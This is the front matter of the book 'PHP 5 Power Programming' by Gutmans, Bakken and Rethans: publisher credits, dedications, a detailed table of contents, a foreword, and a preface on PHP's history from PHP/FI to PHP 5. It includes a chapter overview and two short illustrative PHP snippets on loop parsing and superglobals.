Gutmans Frontmatter

Transcript

1 Gutmans_Frontmatter Page i Thursday, September 23, 2004 9:05 AM PHP 5 Power Programming

BRUCE PERENS’ OPEN SOURCE SERIES
http://www.phptr.com/perens

◆ Java Application Development on Linux
   Carl Albing and Michael Schwarz
◆ C++ GUI Programming with Qt 3
   Jasmin Blanchette, Mark Summerfield
◆ Managing Linux Systems with Webmin: System Administration and Module Development
   Jamie Cameron
◆ Understanding the Linux Virtual Memory Manager
   Mel Gorman
◆ Implementing CIFS: The Common Internet File System
   Christopher Hertel
◆ Embedded Software Development with eCos
   Anthony Massa
◆ Rapid Application Development with Mozilla
   Nigel McFarlane
◆ The Linux Development Platform: Configuring, Using, and Maintaining a Complete Programming Environment
   Rafeeq Ur Rehman, Christopher Paul
◆ Intrusion Detection with SNORT: Advanced IDS Techniques Using SNORT, Apache, MySQL, PHP, and ACID
   Rafeeq Ur Rehman
◆ The Official Samba-3 HOWTO and Reference Guide
   John H. Terpstra, Jelmer R. Vernooij, Editors
◆ Samba-3 by Example: Practical Exercises to Successful Deployment
   John H. Terpstra

PHP 5 Power Programming
Andi Gutmans, Stig Sæther Bakken, and Derick Rethans
PRENTICE HALL Professional Technical Reference
Indianapolis, IN 46240
www.phptr.com

The authors and publisher have taken care in the preparation of this book, but make no expressed or implied warranty of any kind and assume no responsibility for errors or omissions. No liability is assumed for incidental or consequential damages in connection with or arising out of the use of the information or programs contained herein.

Publisher: John Wait
Editor in Chief: Don O’Hagan
Acquisitions Editor: Mark L. Taub
Editorial Assistant: Noreen Regina
Development Editor: Janet Valade
Marketing Manager: Robin O'Brien
Cover Designer: Nina Scuderi
Managing Editor: Gina Kanouse
Senior Project Editor: Kristy Hart
Copy Editor: Specialized Composition
Indexer: Lisa Stumpf
Senior Compositor: Gloria Schurick
Manufacturing Buyer: Dan Uhrig

The publisher offers excellent discounts on this book when ordered in quantity for bulk purchases or special sales, which may include electronic versions and/or custom covers and content particular to your business, training goals, marketing focus, and branding interests. For more information, please contact:

U. S. Corporate and Government Sales
(800) 382-3419
c [email protected]

For sales outside the U. S., please contact:

International Sales
i [email protected]

Visit us on the Web: www.phptr.com

Library of Congress Cataloging-in-Publication Data: 2004107331

Copyright © 2005 Pearson Education, Inc.

This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, v1.0 or later (the latest version is presently available at http://www.opencontent.org/openpub/).

Pearson Education, Inc.
One Lake Street
Upper Saddle River, NJ 07458

Every effort was made to contact and credit all copyright holders. Use of material without proper credit is unintentional.

ISBN 0-131-47149-X

Text printed in the United States on recycled paper at Phoenix in Hagerstown, Maryland.
First printing, [October 2004]

To Ifat, my wife and best friend, who has patiently put up with my involvement in PHP from the very beginning, and has encouraged and supported me every step of the way.
Andi Gutmans

To Marianne, for patience and encouragement.
Stig Sæther Bakken

To my parents, who care for me even when I’m not around; and to 42, the answer to life, the universe and everything.
Derick Rethans


Contents

Foreword by Zeev Suraski
Preface: Introduction and Background
Chapter 1: What Is New in PHP 5?
Chapter 2: PHP 5 Basic Language
Chapter 3: PHP 5 OO Language
Chapter 4: PHP 5 Advanced OOP and Design Patterns
Chapter 5: How to Write a Web Application with PHP
Chapter 6: Databases with PHP 5
Chapter 7: Error Handling
Chapter 8: XML with PHP 5
Chapter 9: Mainstream Extensions
Chapter 10: Using PEAR
Chapter 11: Important PEAR Packages
Chapter 12: Building PEAR Components
Chapter 13: Making the Move
Chapter 14: Performance
Chapter 15: An Introduction to Writing PHP Extensions
Chapter 16: PHP Shell Scripting
A. PEAR and PECL Package Index
B. phpDocumentor Format Reference
C. Zend Studio Quick Start
Index


Contents

Foreword
Preface
1 What Is New in PHP 5?
  1.1 Introduction
  1.2 Language Features
    1.2.1 New Object-Oriented Model
    1.2.2 New Object-Oriented Features
    1.2.3 Other New Language Features
  1.3 General PHP Changes
    1.3.1 XML and Web Services
  1.4 Other New Features in PHP 5
    1.4.1 New Memory Manager
    1.4.2 Dropped Support for Windows 95
  1.5 Summary
2 PHP 5 Basic Language
  2.1 Introduction
  2.2 HTML Embedding
  2.3 Comments
  2.4 Variables
    2.4.1 Indirect References to Variables
    2.4.2 Managing Variables
    2.4.3 Superglobals
  2.5 Basic Data Types
    2.5.1 Integers
    2.5.2 Floating-Point Numbers
    2.5.3 Strings
    2.5.4 Booleans
    2.5.5 Null

    2.5.6 Resources
    2.5.7 Arrays
    2.5.8 Constants
  2.6 Operators
    2.6.1 Binary Operators
    2.6.2 Assignment Operators
    2.6.3 Comparison Operators
    2.6.4 Logical Operators
    2.6.5 Bitwise Operators
    2.6.6 Unary Operators
    2.6.7 Negation Operators
    2.6.8 Increment/Decrement Operators
    2.6.9 The Cast Operators
    2.6.10 The Silence Operator
    2.6.11 The One and Only Ternary Operator
  2.7 Control Structures
    2.7.1 Conditional Control Structures
    2.7.2 Loop Control Structures
    2.7.3 Code Inclusion Control Structures
  2.8 Functions
    2.8.1 User-Defined Functions
    2.8.2 Function Scope
    2.8.3 Returning Values By Value
    2.8.4 Returning Values By Reference
    2.8.5 Declaring Function Parameters
    2.8.6 Static Variables
  2.9 Summary
3 PHP 5 OO Language
  3.1 Introduction
  3.2 Objects
  3.3 Declaring a Class
  3.4 The new Keyword and Constructors
  3.5 Destructors
  3.6 Accessing Methods and Properties Using the $this Variable
    3.6.1 public, protected, and private Properties
    3.6.2 public, protected, and private Methods
    3.6.3 Static Properties
    3.6.4 Static Methods
  3.7 Class Constants
  3.8 Cloning Objects
  3.9 Polymorphism
  3.10 parent:: and self::
  3.11 instanceof Operator

  3.12 Abstract Methods and Classes
  3.13 Interfaces
  3.14 Inheritance of Interfaces
  3.15 final Methods
  3.16 final Classes
  3.17 __toString() Method
  3.18 Exception Handling
  3.19 __autoload()
  3.20 Class Type Hints in Function Parameters
  3.21 Summary
4 PHP 5 Advanced OOP and Design Patterns
  4.1 Introduction
  4.2 Overloading Capabilities
    4.2.1 Property and Method Overloading
    4.2.2 Overloading the Array Access Syntax
  4.3 Iterators
  4.4 Design Patterns
    4.4.1 Strategy Pattern
    4.4.2 Singleton Pattern
    4.4.3 Factory Pattern
    4.4.4 Observer Pattern
  4.5 Reflection
    4.5.1 Introduction
    4.5.2 Reflection API
    4.5.3 Reflection Examples
    4.5.4 Implementing the Delegation Pattern Using Reflection
  4.6 Summary
5 How to Write a Web Application with PHP
  5.1 Introduction
  5.2 Embedding into HTML
  5.3 User Input
  5.4 Safe-Handling User Input
    5.4.1 Common Mistakes
  5.5 Techniques to Make Scripts “Safe”
    5.5.1 Input Validation
    5.5.2 HMAC Verification
    5.5.3 PEAR::Crypt_HMAC
    5.5.4 Input Filter
    5.5.5 Working with Passwords
    5.5.6 Error Handling
  5.6 Cookies
  5.7 Sessions

  5.8 File Uploads
    5.8.1 Handling the Incoming Uploaded File
  5.9 Architecture
    5.9.1 One Script Serves All
    5.9.2 One Script per Function
    5.9.3 Separating Logic from Layout
  5.10 Summary
6 Databases with PHP 5
  6.1 Introduction
  6.2 MySQL
    6.2.1 MySQL Strengths and Weaknesses
    6.2.2 PHP Interface
    6.2.3 Example Data
    6.2.4 Connections
    6.2.5 Buffered Versus Unbuffered Queries
    6.2.6 Queries
    6.2.7 Multi Statements
    6.2.8 Fetching Modes
    6.2.9 Prepared Statements
    6.2.10 BLOB Handling
  6.3 SQLite
    6.3.1 SQLite Strengths and Weaknesses
    6.3.2 Best Areas of Use
    6.3.3 PHP Interface
  6.4 PEAR DB
    6.4.1 Obtaining PEAR DB
    6.4.2 Pros and Cons of Database Abstraction
    6.4.3 Which Features Are Abstracted?
    6.4.4 Database Connections
    6.4.5 Executing Queries
    6.4.6 Fetching Results
    6.4.7 Sequences
    6.4.8 Portability Features
    6.4.9 Abstracted Errors
    6.4.10 Convenience Methods
  6.5 Summary
7 Error Handling
  7.1 Introduction
  7.2 Types of Errors
    7.2.1 Programming Errors
    7.2.2 Undefined Symbols
    7.2.3 Portability Errors

    7.2.4 Runtime Errors
    7.2.5 PHP Errors
  7.3 PEAR Errors
    7.3.1 The PEAR_Error Class
    7.3.2 Handling PEAR Errors
    7.3.3 PEAR Error Modes
    7.3.4 Graceful Handling
  7.4 Exceptions
    7.4.1 What Are Exceptions?
    7.4.2 try, catch, and throw
  7.5 Summary
8 XML with PHP 5
  8.1 Introduction
  8.2 Vocabulary
  8.3 Parsing XML
    8.3.1 SAX
    8.3.2 DOM
  8.4 SimpleXML
    8.4.1 Creating a SimpleXML Object
    8.4.2 Browsing SimpleXML Objects
    8.4.3 Storing SimpleXML Objects
  8.5 PEAR
    8.5.1 XML_Tree
    8.5.2 XML_RSS
  8.6 Converting XML
    8.6.1 XSLT
  8.7 Communicating with XML
    8.7.1 XML-RPC
    8.7.2 SOAP
  8.8 Summary
9 Mainstream Extensions
  9.1 Introduction
  9.2 Files and Streams
    9.2.1 File Access
    9.2.2 Program Input/Output
    9.2.3 Input/Output Streams
    9.2.4 Compression Streams
    9.2.5 User Streams
    9.2.6 URL Streams
    9.2.7 Locking
    9.2.8 Renaming and Removing Files
    9.2.9 Temporary Files

  9.3 Regular Expressions
    9.3.1 Syntax
    9.3.2 Functions
  9.4 Date Handling
    9.4.1 Retrieving Date and Time Information
    9.4.2 Formatting Date and Time
    9.4.3 Parsing Date Formats
  9.5 Graphics Manipulation with GD
    9.5.1 Case 1: Bot-Proof Submission Forms
    9.5.2 Case 2: Bar Chart
    9.5.3 Exif
  9.6 Multi-Byte Strings and Character Sets
    9.6.1 Character Set Conversions
    9.6.2 Extra Functions Dealing with Multi-Byte Character Sets
    9.6.3 Locales
  9.7 Summary
10 Using PEAR
  10.1 Introduction
  10.2 PEAR Concepts
    10.2.1 Packages
    10.2.2 Releases
    10.2.3 Version Numbers
  10.3 Obtaining PEAR
    10.3.1 Installing with UNIX / Linux PHP Distribution
    10.3.2 Installing with PHP Windows Installer
    10.3.3 go-pear.org
  10.4 Installing Packages
    10.4.1 Using the pear Command
  10.5 Configuration Parameters
  10.6 PEAR Commands
    10.6.1 pear install
    10.6.2 pear list
    10.6.3 pear info
    10.6.4 pear list-all
    10.6.5 pear list-upgrades
    10.6.6 pear upgrade
    10.6.7 pear upgrade-all
    10.6.8 pear uninstall
    10.6.9 pear search
    10.6.10 pear remote-list
    10.6.11 pear remote-info
    10.6.12 pear download
    10.6.13 pear config-get

    10.6.14 pear config-set
    10.6.15 pear config-show
    10.6.16 Shortcuts
  10.7 Installer Front-Ends
    10.7.1 CLI (Command Line Interface) Installer
    10.7.2 Gtk Installer
  10.8 Summary
11 Important PEAR Packages
  11.1 Introduction
  11.2 Database Queries
  11.3 Template Systems
    11.3.1 Template Terminology
    11.3.2 HTML_Template_IT
    11.3.3 HTML_Template_Flexy
  11.4 Authentication
    11.4.1 Overview
    11.4.2 Example: Auth with Password File
    11.4.3 Example: Auth with DB and User Data
    11.4.4 Auth Security Considerations
    11.4.5 Auth Scalability Considerations
    11.4.6 Auth Summary
  11.5 Form Handling
    11.5.1 HTML_QuickForm
    11.5.2 Example: Login Form
    11.5.3 Receiving Data
  11.6 Caching
    11.6.1 Cache_Lite
  11.7 Summary
12 Building PEAR Components
  12.1 Introduction
  12.2 PEAR Standards
    12.2.1 Symbol Naming
    12.2.2 Indentation
  12.3 Release Versioning
  12.4 CLI Environment
  12.5 Fundamentals
    12.5.1 When and How to Include Files
    12.5.2 Error Handling
  12.6 Building Packages
    12.6.1 PEAR Example: HelloWorld
    12.6.2 Building the Tarball
    12.6.3 Verification
    12.6.4 Regression Tests

  12.7 The package.xml Format
    12.7.1 Package Information
    12.7.2 Release Information
  12.8 Dependencies
    12.8.1 Element:
    12.8.2 Element:
    12.8.3 Dependency Types
    12.8.4 Reasons to Avoid Dependencies
    12.8.5 Optional Dependencies
    12.8.6 Some Examples
  12.9 String Substitutions
    12.9.1 Element:
    12.9.2 Examples
  12.10 Including C Code
    12.10.1 Element:
    12.10.2 Element:
  12.11 Releasing Packages
  12.12 The PEAR Release Process
  12.13 Packaging
    12.13.1 Source Analysis
    12.13.2 MD5 Checksum Generation
    12.13.3 Package.xml Update
    12.13.4 Tarball Creation
  12.14 Uploading
    12.14.1 Upload Release
    12.14.2 Finished!
  12.15 Summary
13 Making the Move
  13.1 Introduction
  13.2 The Object Model
  13.3 Passing Objects to Functions
  13.4 Compatibility Mode
    13.4.1 Casting Objects
    13.4.2 Comparing Objects
  13.5 Other Changes
    13.5.1 Assigning to $this
    13.5.2 get_class
  13.6 E_STRICT
    13.6.1 Automagically Creating Objects
    13.6.2 var and public
    13.6.3 Constructors
    13.6.4 Inherited Methods
    13.6.5 Define Classes Before Usage

  13.7 Other Compatibility Problems
    13.7.1 Command-Line Interface
    13.7.2 Comment Tokens
    13.7.3 MySQL
  13.8 Changes in Functions
    13.8.1 array_merge()
    13.8.2 strrpos() and strripos()
  13.9 Summary
14 Performance
  14.1 Introduction
  14.2 Design for Performance
    14.2.1 PHP Design Tip #1: Beware of State
    14.2.2 PHP Design Tip #2: Cache!
    14.2.3 PHP Design Tip #3: Do Not Over Design!
  14.3 Benchmarking
    14.3.1 Using ApacheBench
    14.3.2 Using Siege
    14.3.3 Testing Versus Real Traffic
  14.4 Profiling with Zend Studio's Profiler
  14.5 Profiling with APD
    14.5.1 Installing APD
    14.5.2 Analyzing Trace Data
  14.6 Profiling with Xdebug
    14.6.1 Installing Xdebug
    14.6.2 Tracing Script Execution
    14.6.3 Using KCachegrind
  14.7 Using APC (Advanced PHP Cache)
  14.8 Using ZPS (Zend Performance Suite)
    14.8.1 Automatic Optimization
    14.8.2 Compiled Code Caching
    14.8.3 Dynamic Content Caching
    14.8.4 Content Compression
  14.9 Optimizing Code
    14.9.1 Micro-Benchmarks
    14.9.2 Rewrite in C
    14.9.3 OO Versus Procedural Code
  14.10 Summary
15 An Introduction to Writing PHP Extensions
  15.1 Introduction
  15.2 Quickstart
    15.2.1 Memory Management
    15.2.2 Returning Values from PHP Functions
    15.2.3 Completing self-concat()
    15.2.4 Summary of Example
    15.2.5 Wrapping Third-Party Extensions

    15.2.6 Global Variables
    15.2.7 Adding Custom INI Directives
    15.2.8 Thread-Safe Resource Manager Macros
  15.3 Summary
16 PHP Shell Scripting
  16.1 Introduction
  16.2 PHP CLI Shell Scripts
    16.2.1 How CLI Differs From CGI
    16.2.2 The Shell-Scripting Environment
    16.2.3 Parsing Command-Line Options
    16.2.4 Good Practices
    16.2.5 Process Control
    16.2.6 Examples
  16.3 Summary
A PEAR and PECL Package Index
  A.1 Authentication
  A.2 Benchmarking
  A.3 Caching
  A.4 Configuration
  A.5 Console
  A.6 Database
  A.7 Date and Time
  A.8 Encryption
  A.9 File Formats
  A.10 File System
  A.11 Gtk Components
  A.12 HTML
  A.13 HTTP
  A.14 Images
  A.15 Internationalization
  A.16 Logging
  A.17 Mail
  A.18 Math
  A.19 Networking
  A.20 Numbers
  A.21 Payment
  A.22 PEAR
  A.23 PHP
  A.24 Processing
  A.25 Science
  A.26 Streams
  A.27 Structures
  A.28 System
  A.29 Text

  A.30 Tools and Utilities
  A.31 Web Services
  A.32 XML
B phpDocumentor Format Reference
  B.1 Introduction
  B.2 Documentation Comments
  B.3 Tag Reference
    B.3.1 abstract
    B.3.2 access
    B.3.3 author
    B.3.4 category
    B.3.5 copyright
    B.3.6 deprecated
    B.3.7 example
    B.3.8 filesource
    B.3.9 final
    B.3.10 global
    B.3.11 ignore
    B.3.12 inheritdoc (inline)
    B.3.13 internal, internal (inline)
    B.3.14 licence
    B.3.15 link
    B.3.16 link (inline)
    B.3.17 name
    B.3.18 package
    B.3.19 param
    B.3.20 return
    B.3.21 see
    B.3.22 since
    B.3.23 static
    B.3.24 staticvar
    B.3.25 subpackage
    B.3.26 todo
    B.3.27 uses
    B.3.28 var
    B.3.29 version
  B.4 Tag Table
  B.5 Using the phpDocumentor Tool
C Zend Studio Quick Start Guide
  C.1 Version 3.5.x
  C.2 About the Zend Studio Client Quick Start Guide
  C.3 About Zend
  C.4 Zend Studio Client: Overview

    C.4.1 Studio Components
    C.4.2 Client Server Configuration
    C.4.3 Installation and Registration
  C.5 Editing a File
    C.5.1 Editing a File
  C.6 Working with Projects
    C.6.1 Advantages of Working with Projects
    C.6.2 How to Create a Project
  C.7 Running the Debugger
    C.7.1 Internal Debugger
    C.7.2 Remote Debugger
    C.7.3 Debug URL
  C.8 Configure Studio Server for Remote Debugger and Profiling
  C.9 Running the Profiler
  C.10 Product Support
    C.10.1 Getting Support
  C.11 Main Features
Index

Foreword

Within the last few years, PHP has grown to be the most widespread web platform in the world, operational in more than a third of the web servers across the globe. PHP's growth is not only quantitative but also qualitative. More and more companies, including Fortune companies, rely on PHP to run their business-critical applications, which creates new jobs and increases the demand for PHP developers. Version 5, due to be released in the very near future, holds an even greater promise.

While the complexity of starting off with PHP remains unchanged and very low, the features offered by PHP today enable developers to reach far beyond simple HTML applications. The revised object model allows for large-scale projects to be written efficiently, using standard object-oriented methodologies. New XML support makes PHP the best language available for processing XML and, coupled with new SOAP support, an ideal platform for creating and using Web Services.

This book, written by my colleague, Andi Gutmans, and two very prominent PHP developers, Stig Bakken and Derick Rethans, holds the key to unlocking the riches of PHP 5. It thoroughly covers all of the features of the new version, and is a must-have for all PHP developers who are interested in exploring PHP 5's advanced features.

Zeev Suraski

Preface

“The best security against revolution is in constant correction of abuses and the introduction of needed improvements. It is the neglect of timely repair that makes rebuilding necessary.”
Richard Whately

IN THE BEGINNING

It was eight years ago that Rasmus Lerdorf first started developing PHP/FI. He could not have imagined that his creation would eventually lead to the development of PHP as we know it today, which is being used by millions of people. The first version of “PHP/FI,” called Personal Homepage Tools/Form Interpreter, was a collection of Perl scripts in 1995.[1] One of the basic features was a Perl-like language for handling form submissions, but it lacked many common useful language features, such as for loops.

[1] http://groups.google.com/[email protected]

PHP/FI 2

A rewrite came with PHP/FI 2 in 1997,[2] but at that time the development was almost solely handled by Rasmus. After its release in November of that year, Andi Gutmans and Zeev Suraski bumped into PHP/FI while looking for a language to develop an e-commerce solution as a university project. They discovered that PHP/FI was not quite as powerful as it seemed, and its language was lacking many common features. One of the most interesting aspects was the way while loops were implemented. The hand-crafted lexical scanner would go through the script, and when it hit the while keyword it would remember its position in the file. At the end of the loop, the file pointer sought back to the saved position, and the whole loop was reread and re-executed.

PHP 3

Zeev and Andi decided to completely rewrite the scripting language. They then teamed up with Rasmus to release PHP 3, and along with it came a new name: PHP: Hypertext Preprocessor, to emphasize that PHP was a different product and not only suitable for personal use. Zeev and Andi had also designed and implemented a new extension API. This new API made it possible to easily support additional extensions for performing tasks such as accessing databases, spell checkers, and other technologies, which attracted many developers who were not part of the “core” group to join and contribute to the PHP project. At the time of PHP 3’s release[3] in June 1998, the estimated PHP installed base consisted of about 50,000 domains. PHP 3 sparked the beginning of PHP’s real breakthrough, and was the first version to have an installed base of more than one million domains.

PHP 4

In late 1998, Zeev and Andi looked back at their work in PHP 3 and felt they could have written the scripting language even better, so they started yet another rewrite.
While PHP 3 still continuously parsed the scripts while executing them, PHP 4 came with a new paradigm of “compile first, execute later.” The compilation step does not compile PHP scripts into machine code; it instead compiles them into byte code, which is then executed by the Zend Engine (Zend stands for Zeev & Andi), the new heart of PHP 4. Because of this new way of executing scripts, the performance of PHP 4 was much better than that of PHP 3, with only a small amount of backward compatibility breakage.[4] Among other improvements were an improved extension API for better run-time performance, a web server abstraction layer allowing PHP 4 to run on most popular web servers, and lots more. PHP 4 was officially released on May 22, 2000, and today its installed base has surpassed 15 million domains.

[2] http://groups.google.com/groups?selm=Dn1JM9.61t%40gpu.utcc.utoronto.ca
[3] http://groups.google.com/groups?selm=Pine.WNT.3.96.980606130654.-317675I-100000%40shell.lerdorf.on.ca
[4] http://www.php.net/manual/en/migration4.php
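The difference between rereading a loop body on every pass, as described for PHP/FI 2, and the “compile first, execute later” approach of PHP 4 can be sketched with a toy example. This is only an illustration under stated assumptions: the two-word instruction format and the functions parse_line(), execute(), run_reparsing(), and run_compiled() are hypothetical names invented here, and nothing below reflects the actual PHP/FI scanner or the Zend Engine internals.

```php
<?php
// Toy illustration only; NOT how PHP/FI or the Zend Engine is implemented.

// Hypothetical "parser": turns a source line such as "add 2" into an
// instruction array and counts how often parsing happens.
function parse_line($line, &$parseCount)
{
    $parseCount++;
    $parts = explode(' ', trim($line));
    return array('op' => $parts[0], 'arg' => (int) $parts[1]);
}

// Hypothetical "executor": applies one parsed instruction to a running total.
function execute($instruction, &$total)
{
    if ($instruction['op'] === 'add') {
        $total += $instruction['arg'];
    }
}

// Strategy 1: reread and reparse the loop body on every iteration.
function run_reparsing($body, $iterations)
{
    $total = 0;
    $parses = 0;
    for ($i = 0; $i < $iterations; $i++) {
        foreach ($body as $line) {
            execute(parse_line($line, $parses), $total);
        }
    }
    return array($total, $parses);
}

// Strategy 2: parse ("compile") the body once, then execute the result repeatedly.
function run_compiled($body, $iterations)
{
    $total = 0;
    $parses = 0;
    $compiled = array();
    foreach ($body as $line) {
        $compiled[] = parse_line($line, $parses);
    }
    for ($i = 0; $i < $iterations; $i++) {
        foreach ($compiled as $instruction) {
            execute($instruction, $total);
        }
    }
    return array($total, $parses);
}

$body = array('add 2', 'add 3');
list($total1, $parses1) = run_reparsing($body, 4);
list($total2, $parses2) = run_compiled($body, 4);

echo "reparsing: total=$total1 parses=$parses1\n";
echo "compiled:  total=$total2 parses=$parses2\n";
```

Both strategies compute the same total; the second simply does the parsing work once, however many times the loop runs.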

In PHP 3, the minor version number (the middle digit) was never used, and all versions were numbered as 3.0.x. This changed in PHP 4, and the minor version number was used to denote important changes in the language. The first important change came in PHP 4.1.0,[5] which introduced superglobals such as $_GET and $_POST. Superglobals can be accessed from within functions without having to use the global keyword. This feature was added in order to allow the register_globals INI option to be turned off. register_globals is a feature in PHP which automatically converts input variables like "?foo=bar" in http://php.net/?foo=bar to a PHP variable called $foo. Because many people do not check input variables properly, many applications had security holes, which made it quite easy to circumvent security and authentication code.

With the new superglobals in place, on April 22, 2002, PHP 4.2.0 was released with register_globals turned off by default. PHP 4.3.0, the last significant PHP 4 version, was released on December 27, 2002. This version introduced the Command Line Interface (CLI), a revamped file and network I/O layer (called streams), and a bundled GD library. Although most of those additions have no real effect on end users, the minor version number was bumped due to the major changes in PHP’s core.

PHP 5

Soon after, the demand for more common object-oriented features increased immensely, and Andi came up with the idea of rewriting the object-oriented part of the Zend Engine. Zeev and Andi wrote the “Zend Engine II: Feature Overview and Design” document[6] and jumpstarted heated discussions about PHP’s future. Although the basic language has stayed the same, many features were added, dropped, and changed by the time PHP 5 matured. For example, namespaces and multiple inheritance, which were mentioned in the original document, never made it into PHP 5.
Multiple inheritance was dropped in favor of interfaces, and namespaces were dropped completely. You can find a full list of new features in Chapter 1, “What Is New in PHP 5?”

PHP 5 is expected to maintain and even increase PHP’s leadership in the web development market. Not only does it revolutionize PHP’s object-oriented support, but it also contains many new features which make it the ultimate web development platform. The rewritten XML functionality in PHP 5 puts it on par with other web technologies in some areas and overtakes them in others, especially due to the new SimpleXML extension, which makes it ridiculously easy to manipulate XML documents. In addition, the new SOAP, MySQLi, and a variety of other extensions are significant milestones in PHP’s support for additional technologies.

[5] http://www.php.net/release_4_1_0.php
[6] http://zend.com/engine2/ZendEngine-2.0.pdf
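The superglobals introduced in PHP 4.1.0, described in the PHP 4 history above, can be illustrated with a short sketch. It assumes a request like http://php.net/?foo=bar, simulated here by filling $_GET by hand so the script also runs from the command line; query_param() is a hypothetical helper written for this example, not a PHP function.

```php
<?php
// Simulate the request http://php.net/?foo=bar. On the command line $_GET
// starts out empty, so the value is set by hand for this sketch.
$_GET['foo'] = 'bar';

// Hypothetical helper (not part of PHP): returns a query-string value,
// or a default when the parameter is absent.
function query_param($name, $default = null)
{
    // $_GET is a superglobal, so no "global $_GET;" statement is needed here.
    return isset($_GET[$name]) ? $_GET[$name] : $default;
}

// With register_globals turned off, "?foo=bar" does not create $foo
// automatically; the script asks for each input value explicitly.
$foo  = query_param('foo');
$page = query_param('page', 'home');

echo "foo = $foo\n";
echo "page = $page\n";
```

Reading input explicitly like this keeps request data from silently overwriting variables the script relies on, which is the class of security hole the preface attributes to register_globals.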

AUDIENCE

This book is an introduction to the advanced features new to PHP 5. It is written for PHP programmers who are making the move to PHP 5. Although Chapter 2, “PHP 5 Basic Language,” contains an introduction to PHP 5 syntax, it is meant as a refresher for PHP programmers and not as a tutorial for new programmers. However, web developers with experience programming other high-level languages may indeed find that this tutorial is all they need in order to begin working effectively with PHP 5.

CHAPTER OVERVIEW

Chapter 1, “What Is New in PHP 5?” discusses the new features in PHP 5. Most of these are object-oriented features, and the chapter includes small examples for each one. It also gives an overview of the new extensions in PHP 5. Most of the topics mentioned in this chapter are explained in more detail in later chapters.

Chapter 2, “PHP 5 Basic Language,” introduces the PHP syntax to those readers not familiar with PHP. All basic language constructs and variable types are explained along with simple examples to give the reader the necessary building blocks to build real scripts.

Chapter 3, “PHP 5 OO Language,” continues exploring PHP 5's syntax, focusing on its object-oriented functionality. This chapter covers basics, such as properties and methods, and progresses to more complicated subjects, such as polymorphism, interfaces, exceptions, and lots more.

Using the previous chapter as a foundation, Chapter 4, “PHP 5 Advanced OOP and Design Patterns,” covers some of the most advanced features of PHP 5’s object model. After learning these features, including four commonly used design patterns and PHP’s reflection capabilities, you will soon become an OO wizard.

Now that you are familiar with the syntax and language features of PHP, Chapter 5, “How to Write a Web Application with PHP,” introduces you to the world of writing web applications.
The authors show you basics, such as handling input through form variables and safety techniques, but this chapter also includes more advanced topics, such as handling sessions with cookies and PHP's session extension. You also find a few tips on laying out your source code for your web applications.

Chapter 6, “Databases with PHP 5,” introduces using MySQL, SQLite, and Oracle from PHP, but focuses primarily on the PHP 5-specific details of database access. For each database, you learn about some of its strong and weak points, as well as the types of applications at which each excels. And of course, you learn how to interface with them using PHP's native functions or using PEAR DB.

All scripts can throw errors, but of course you do not want them to show up on your web site once your application has passed its development stage. Chapter 7, “Error Handling,” deals with the different types of errors that exist, how to handle those errors with PHP, and how to handle errors with PEAR.

As one of the important new features in PHP 5 is its renewed XML support, a chapter on XML features in PHP 5 could not be left out. Chapter 8, “XML with PHP 5,” talks about the different strategies of parsing XML and converting XML to other formats with XSLT. XML-RPC and SOAP are introduced to show you how to implement web services with both techniques.

Although not specifically for PHP 5, the five mainstream extensions that Chapter 9, “Mainstream Extensions,” covers are important enough to deserve a place in this book. The first section, “Files and Streams,” explains handling files and network streams. A stream is nothing more than a way to access external data, such as a file, remote URL, or compressed file. The second section, “Regular Expressions,” explains the syntax of a regular expression engine (PCRE) that PHP uses, with numerous examples to show you how these expressions can make your life easier. In “Date Handling,” we explain the different functions used to parse and format date and time strings. In “Graphics Manipulation with GD,” we show you through two real-life scenarios the basic functions of creating and manipulating graphics with PHP. The last section in this chapter, “Multi-Byte Strings and Character Sets,” explains the different character sets and the functions to convert and handle different ones, including multi-byte strings used in Asian languages.

Chapter 10, “Using PEAR,” introduces PEAR, the PHP Extension and Application Repository. Starting with concepts and installation, the chapter shows how to use PEAR and maintain the locally installed packages.
This chapter also includes a tour of the PEAR web site.

Chapter 11, “Important PEAR Packages,” gives an overview of the most important PEAR packages, along with examples. Packages covered include template systems, the Auth package for authentication, form handling with the HTML_QuickForm package, and a package used to simplify caching.

Chapter 12, “Building PEAR Components,” explains how to create your own PEAR package. The PEAR Coding Standard and the package.xml package definition format, together with tips on including files and package layout, get you on your way to completing your first PEAR package.

Chapter 13, “Making the Move,” deals with the few backward-incompatible changes that were introduced between PHP 4 and PHP 5. This chapter tells you what you need to take care of when making your application work on PHP 5, and provides workarounds wherever possible.

Chapter 14, “Performance,” shows you how to make your scripts perform better. The chapter offers tips on standard PHP usage, the use of external utilities (APD and Xdebug) to find problems in your scripts, and PHP accelerators like APC and Zend Performance Suite.

Chapter 15, “An Introduction to Writing PHP Extensions,” explains how to write your own custom PHP extension. We use a simple example to explain the most important things, like parameter parsing and resource management.

Chapter 16, “PHP Shell Scripting,” shows you how to write shell scripts in PHP, because PHP is useful for more than just web applications. We carefully explain the differences between the CLI and CGI executables in which PHP comes, including command-line parameter parsing and process control.

This book also includes three appendices. Appendix A, “PEAR and PECL Package Index,” provides an overview of all important packages, with descriptions and dependencies on other packages. Appendix B, “phpDocumentor Format Reference,” explains the syntax understood by the phpDocumentor tool to generate API documentation from source code. Appendix C, “Zend Studio Quick Start,” is an introduction to working in the Zend Studio IDE.

A NOTE ABOUT CODING STYLES

There are almost as many coding styles as there are programmers. The PHP examples in this book follow the PEAR coding standard, with the opening curly bracket on the line below the function name. In some cases, we’ve placed the curly bracket on the same line as the function name. We encourage you to adopt the style you are most comfortable with.

Note: A code continuation character, ➥, appears at the beginning of code lines that have wrapped down from the line above it.

ABOUT THE SOFTWARE

Included in the back of this book is a special link to Zend.com, where you can download a fully functional, 90-day trial version of the Zend Studio IDE. Be sure to use the license key printed on the inside back cover of this book when you install Zend Studio.
The Zend Development Environment (ZDE) is a convenient tool that integrates an editor, debugger, and project manager to help you develop, manage, and debug your code. It can connect to your own installed server or directly to the Zend Studio server component. It is a powerful tool that allows you to debug your code in its natural environment.

UPDATES, ERRATA, AND DOWNLOADS

Updates, errata, and copies of the sample programs used in this book can be found at the following URL: http://php5powerprogramming.com. We encourage you to visit this site.

ACKNOWLEDGEMENTS

